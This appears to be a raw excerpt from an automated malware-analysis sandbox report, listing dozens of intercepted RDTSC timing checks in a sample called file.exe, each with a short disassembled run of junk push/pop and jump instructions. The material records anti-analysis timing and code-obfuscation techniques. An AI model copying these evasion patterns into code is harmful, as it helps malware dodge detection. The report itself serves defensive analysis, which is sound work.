Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7070A4 second address: 7070A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707350 second address: 70735D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FD0F8CDABE8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70735D second address: 707369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD0F8E1A7A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707369 second address: 707386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707386 second address: 707390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707390 second address: 70739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70739A second address: 7073B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7073B4 second address: 7073E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD0F8CDABEAh 0x00000012 pop eax 0x00000013 ja 00007FD0F8CDABF9h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7073E5 second address: 70740C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B8h 0x00000009 jmp 00007FD0F8E1A7ABh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707ED6 second address: 707EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FD0F8CDABE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707EE9 second address: 707EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707EED second address: 707F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 ja 00007FD0F8CDAC15h 0x0000000d jnc 00007FD0F8CDAC01h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 700043 second address: 700059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 700059 second address: 700074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FD0F8CDABE6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007FD0F8CDABF0h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CD9C0 second address: 6CD9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708729 second address: 70873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FD0F8CDABE6h 0x0000000c jno 00007FD0F8CDABE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70873D second address: 70874A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70874A second address: 708750 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708750 second address: 708760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD0F8E1A7AEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708760 second address: 70876E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FD0F8CDABE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70876E second address: 708772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708A49 second address: 708A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708A4F second address: 708A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708CFB second address: 708CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708CFF second address: 708D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FD0F8E1A7A6h 0x0000000d jnc 00007FD0F8E1A7A6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70CBF9 second address: 70CBFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70CBFF second address: 70CC25 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8E1A7ACh 0x00000008 jl 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD0F8E1A7B1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70CC25 second address: 70CC2F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70DCC8 second address: 70DCDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0F8E1A7A6h 0x00000008 je 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70DCDB second address: 70DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70DCE1 second address: 70DCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70DCFA second address: 70DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD0F8CDABEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714917 second address: 714921 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0F8E1A7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714921 second address: 714927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713D25 second address: 713D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713EAF second address: 713EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007FD0F8CDABE6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7145CB second address: 7145E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0F8E1A7ADh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7145E0 second address: 7145EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71476F second address: 714775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714775 second address: 71477F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71477F second address: 714794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0F8E1A7AFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714794 second address: 7147A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715D92 second address: 715DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715EA4 second address: 715EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715EA8 second address: 715EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715EAE second address: 715EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716087 second address: 716090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716D1C second address: 716D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716D26 second address: 716D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 717E7B second address: 717ED0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0F8CDABE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FD0F8CDABEAh 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD0F8CDABE8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D29DFh] 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b mov dword ptr [ebp+122D1835h], edi 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 mov esi, 252D9022h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 717ED0 second address: 717ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 717ED6 second address: 717EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718DD6 second address: 718DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71984B second address: 7198C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 pushad 0x00000009 movzx edx, dx 0x0000000c jl 00007FD0F8CDABFBh 0x00000012 jmp 00007FD0F8CDABF5h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FD0F8CDABE8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jg 00007FD0F8CDABEEh 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D2DD7h], ebx 0x00000042 xchg eax, ebx 0x00000043 jmp 00007FD0F8CDABEDh 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7198C1 second address: 7198CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A397 second address: 71A39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A39C second address: 71A3F6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0F8E1A7ACh 0x00000008 js 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add esi, dword ptr [ebp+12484AF8h] 0x00000017 jmp 00007FD0F8E1A7B7h 0x0000001c push 00000000h 0x0000001e call 00007FD0F8E1A7B8h 0x00000023 mov esi, dword ptr [ebp+122D2BDBh] 0x00000029 pop esi 0x0000002a push 00000000h 0x0000002c movzx esi, si 0x0000002f xchg eax, ebx 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3F6 second address: 71A3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AE4F second address: 71AE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AC19 second address: 71AC28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AE54 second address: 71AE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AE63 second address: 71AEBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FD0F8CDABEFh 0x00000013 jmp 00007FD0F8CDABF0h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD0F8CDABF9h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AEBC second address: 71AF36 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jnp 00007FD0F8E1A7ACh 0x0000000e mov dword ptr [ebp+122D1835h], edi 0x00000014 mov edi, dword ptr [ebp+122D1BE4h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FD0F8E1A7A8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jng 00007FD0F8E1A7ACh 0x0000003c sbb esi, 705AF71Fh 0x00000042 push 00000000h 0x00000044 call 00007FD0F8E1A7B7h 0x00000049 mov esi, dword ptr [ebp+122D2B63h] 0x0000004f pop edi 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jc 00007FD0F8E1A7ACh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C2C1 second address: 71C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C2C7 second address: 71C2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C2CD second address: 71C2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C2D1 second address: 71C2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71DD35 second address: 71DD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71DD3F second address: 71DD43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F302 second address: 71F323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD0F8CDABFAh 0x0000000d jmp 00007FD0F8CDABEEh 0x00000012 jnp 00007FD0F8CDABE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F323 second address: 71F349 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0F8E1A7ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD0F8E1A7B4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721F73 second address: 721F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7225E7 second address: 7225EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7225EB second address: 7225EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72270A second address: 72270F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7248BA second address: 7248C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72270F second address: 722715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7258F1 second address: 7258F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7248C0 second address: 7248C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7258F7 second address: 725904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FD0F8CDABE6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725B01 second address: 725B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725B07 second address: 725B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7278C5 second address: 7278CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728918 second address: 72891C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72891C second address: 728957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0F8E1A7ADh 0x0000000c jmp 00007FD0F8E1A7ACh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FD0F8E1A7B3h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B3D second address: 727B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728957 second address: 72895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B41 second address: 727B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72895C second address: 7289B9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8E1A7A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2DF6h], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FD0F8E1A7A8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov di, cx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FD0F8E1A7A8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B50 second address: 727B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7289B9 second address: 7289BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B55 second address: 727B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7289BE second address: 7289C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B5B second address: 727B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
